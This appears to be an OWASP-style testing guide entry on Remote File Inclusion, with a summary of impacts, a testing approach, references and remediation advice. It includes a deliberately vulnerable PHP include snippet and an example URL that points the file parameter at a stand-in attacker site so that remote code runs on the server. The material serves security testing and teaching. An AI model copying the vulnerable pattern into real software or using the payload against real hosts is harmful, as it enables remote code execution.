## Summary

The File Inclusion vulnerability allows an attacker to include a file,
usually exploiting a "dynamic file inclusion" mechanisms implemented in
the target application. The vulnerability occurs due to the use of
user-supplied input without proper validation.

This can lead to something as outputting the contents of the file, but
depending on the severity, it can also lead to:

  - Code execution on the web server
  - Code execution on the client-side such as JavaScript which can lead
    to other attacks such as cross site scripting (XSS)
  - Denial of Service (DoS)
  - Sensitive Information Disclosure

**Remote File Inclusion** (also known as RFI) is the process of
including remote files through the exploiting of vulnerable inclusion
procedures implemented in the application. This vulnerability occurs,
for example, when a page receives, as input, the path to the file that
has to be included and this input is not properly sanitized, allowing
external URL to be injected. Although most examples point to vulnerable
PHP scripts, we should keep in mind that it is also common in other
technologies such as JSP, ASP and others.

## How to Test

Since RFI occurs when paths passed to "include" statements are not
properly sanitized, in a blackbox testing approach, we should look for
scripts which take filenames as parameters. Consider the following PHP
example:

    $incfile = $_REQUEST["file"];
    include($incfile.".php");

In this example the path is extracted from the HTTP request and no input
validation is done (for example, by checking the input against a white
list), so this snippet of code results vulnerable to this type of
attack. Consider infact the following URL:

```

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page
```

In this case the remote file is going to be included and any code
contained in it is going to be run by the server.

## References

**Whitepapers**

  - “Remote File Inclusion” -
    <http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion>
  - Wikipedia: "Remote File Inclusion" -
    <http://en.wikipedia.org/wiki/Remote_File_Inclusion>

## Remediation

The most effective solution to eliminate file inclusion vulnerabilities
is to avoid passing user-submitted input to any filesystem/framework
API. If this is not possible the application can maintain a white list
of files, that may be included by the page, and then use an identifier
(for example the index number) to access to the selected file. Any
request containing an invalid identifier has to be rejected, in this way
there is no attack surface for malicious users to manipulate the path.